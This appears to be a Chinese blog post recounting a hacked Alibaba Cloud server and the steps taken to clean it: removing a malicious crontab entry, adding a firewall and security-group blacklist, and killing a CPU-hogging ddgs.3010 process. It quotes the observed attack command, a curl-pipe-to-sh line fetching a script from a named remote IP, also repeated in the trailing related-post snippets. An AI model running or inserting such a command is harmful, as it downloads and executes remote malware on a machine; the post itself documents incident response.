2. 程式人生 > >記一次阿里雲黑客攻擊事件

記一次阿里雲黑客攻擊事件

阿新 發佈:2019-01-21

這幾天伺服器一直髮生異常行為,阿里雲報警如下:



根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個程序一直從這個美國的IP地址下載sh可執行檔案

訪問這個地址:http://165.225.157.157:8000/i.sh

看到執行語句如下:


大概明白,意思是定時從這個地址獲取sh可執行檔案,然後新增到定時任務crontab,還生成了ddgs.3010檔案不斷後臺執行。

So,第一步,檢視crontab -l ,果然有


那麼顯而易見,執行:crontab -r 刪除掉cron任務。

第二步,安裝firewall,具體操作,參考我的另外一篇部落格:https://blog.csdn.net/u012259256/article/details/61018892

限制固定的訪問埠:


第三步,其實阿里雲後臺提供了安全組策略,可以完成防火牆的功能,而且更加方便配置,配置如下(並且把165.225.157.157加入黑名單,不允許訪問):



第四步,kill掉這些惡毒的程序,MD

用top命令,實時檢視程序佔用情況


(PS:因為程序已經被我kill掉,所以看不到資料啦)

沒有kill之前,有一個惡意程序CPU佔用198%,還有ddgs.3010程序,一直後臺執行。總之,找到PID,然後kill就可以!

---------------------------------------------

總結:買了伺服器一定記得先安裝防火牆,或者設定安全策略!

Yeager

相關推薦

阿里黑客攻擊事件

這幾天伺服器一直髮生異常行為,阿里雲報警如下:根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個程序一直從這個美國的IP地址下載sh可執行檔案訪問這個地址:http://165

服務器被攻擊事件

不用 時間 edi 能夠 hist 幹凈 col nbsp ssh key 病毒清除 事情都解決了好多天,今天來總結一下,那天開發問數據備份沒有沒有拉到他們的那臺服務器上,於是乎就去看了一下為什麽定時任務沒有執行,看了之後,waht???我的定時任務全部沒了,NND 定時任

阿里盤擴容遇到的坑

背景 生產環境使用了阿里雲並且以mongo作為圖片伺服器,由於業務發展需要資料盤的400G的容量已經用到81%,所以需要對磁碟做無損擴容操作。 操作步驟 在控制檯上擴容資料盤的磁碟空間 官方文件:https://help.aliyun.com/document_detail/25452.html?s

阿里日誌服務配置

1、個人站點,沒有特殊要求,不要開通執行日誌,否則日誌儀表盤中看到一大波不相干的日誌,而且還費流量 2、分析apache日誌時,我一開始是直接跟著阿里雲文件:https://help.aliyun.com/document_detail/87740.html上面用customized的LogFormat

阿里伺服器執行慢排除

公司測試環境用的阿里雲伺服器+docker部署的,一共跑了14個專案。之前幾個月一直OK,最近幾天突然很卡很慢。剛開始以為是專案問題,又是擴大記憶體,又是清減外掛,甚至停了一半專案。結果CPU是下來了,但是構建、啟動、訪問還是很慢,各種百度、google、群裡問都沒能找到原因,最後提了個工單說明情況。 回覆說

阿里SSL配置

https://blog.csdn.net/qq371959453/article/details/80508789 SSL申請上文中有 我這邊沒有用到nginx所以也就不用這些東西  直接在阿里雲上面配置,也是自己摸索的 反正http 已經變成了https了 有用到的可以參考

阿里RDS與自建資料庫同步中斷的補救過程

背景 2018年4月24日上午9點左右,小編在即將託管的伺服器上建立資料庫,並通過openvpn建立加密隧道,從而實現阿里雲RDS和本地自建資料庫之間同步。在託管伺服器上配置openvpn後,重啟openvpn客戶端時,一直獲取不到ip,後面重啟了一下openvpn服務端,本地託管伺服器獲取到了IP,之後小

學習hadoop遇到的問題(阿里伺服器被惡意掛木馬,CPU100%)

在我剛開始學習時,把防火牆,安全組都開放了,過了一段時間被掛上了木馬。並且殺死程序一會還啟動 解決辦法 1通過命令netstat -antlp|grep 9002檢視埠檔案地址,刪除可以檔案(java資料夾) 2.還得在安全組中關閉hadoop一些對外開放的web頁面(可以改變埠號)

阿里伺服器遷移

今天凌晨兩點 伺服器定時遷移了遷移之前 先把開機自啟動修改了一下 發現memcached沒有開機自啟動新增方式vim /etc/rc.d/rc.local增加一行/data/website/xunsearch/bin/xs-ctl.sh restart /usr/local/

阿里LVM擴容與 LVM 相關知識學習

一、lvm 擴容 問題: 我們阿里雲伺服器有一個磁碟容量為 1T ,但是最近由於業務的擴增,磁碟容量已經不夠了,需要增大磁碟的容量。磁碟掛載在 /home,使用的是 LVM。我們現在需要對磁碟進行擴容。 通過增加新的磁碟,然後將磁碟新增到卷組(VG),然後再將邏輯卷(LV)擴容。 擴容原有的磁碟。然後再

HDFS的block corrupt事件

查找 保存 需要 一次 ilo maps 易懂 data edit 還有最後兩天班,明天晚上回家過年了,可是CDH突然報了一個block missing的錯誤,用 hdfs fsck /檢查了一下,我們的塊一共有500W個,missing了將近100W個,天

openstack 主機熱遷移失敗與恢復過程

openstack 遷移失敗 背景:最近把openstack上的所有機器的磁盤逐一重新分區,之前是兩塊磁盤用RAID1,但是ceph已經配置了3份副本,這樣相當於存6份副本了,目前磁盤資源不太夠。機器用的是HP P440ar的陣列卡,支持建立不同模式的邏輯卷,所以把磁盤分區修改為RAID1系統盤+RA

阿里上的kakfa叢集升級歷險記

       由於要在生產環境上debezium,筆者看到生產環境上的kafka版本是1.0.0,而現在kafka最新版本都是2.0了,於是想升級一下kafka。按照kafka的官網上的例子來升級。發現升級完kafka叢集

阿里伺服器遷移路程

關於遷移: 1、伺服器遷移操作指引: (1)使用例項建立自定義映象https://help.aliyun.com/document_detail/35109.html (2)共享映象https://help.aliyun.com/document_detail/25463.html (3)建立例

後臺被入侵的事件及反思

前幾天後臺被入侵,造成伺服器癱瘓數個小時,雖然資料都沒有丟失,但是也著實嚇出一身汗,下面還原整個事件 晚上10點左右,有人反應進不去app了,我還以為是玩笑,結果是伺服器檔案被刪除了,趕緊停服務檢視,c

React中非同步獲取事件物件的爬坑經歷

SyntheticEvent objects are pooled 在使用React過程中,直接非同步獲取事件物件上的屬性,實際上我們拿到的值永遠是null,下面的程式碼就存在問題 const handleClick = e => { setTimeout(() => {

阿里電話面試

晚上九點跟朋友在看電影,正看到一半的時候接到來自杭州阿里巴巴的固定電話,心裡一驚,呀,好突然的電話面試啊,然後在毫無準備的情況下開始了這次的面試。接通電話一個聽上去很和藹的聲音開始自我介紹然後問我是否方便進行面試,在聽說我正在看電影之後說再約一個時間進行面試,我想了一下,本想

記錄阿里RDS-Mysql備份檔案,本地windows資料庫恢復過程

恢復雲資料庫MySQL的備份檔案到自建資料庫 https://help.aliyun.com/knowledge_detail/41817.html 官方給的是linux系統的恢復教程現在我們本地mysql資料庫是windows系統的mysql,以下是下載rds備份包在本地的

linux伺服器被攻擊的處理經歷

首先發現IO、流量異常。查詢登入記錄,果不其然last命令沒有結果,/var/log/wtmp檔案被刪除。查詢/var/log/secure檔案中的登入記錄:grep "Accept" /var/log/secure查dstat的日誌檔案,正是10:51分開始出現IO異常。用

阿里面試總結

一面,電話面: 大概早上9點左右,收到了阿里HR的小姐姐的電話,聲音很好聽,雖然後面不怎麼管我了...跟她約了晚上9點的電話面..然後一整天上班不在狀態,開始各種回顧之前準備的知識.為了這次面試大概準備了半個月,利用每天下班到家8點到凌晨1點30的時間,瘋狂的補充自己的技術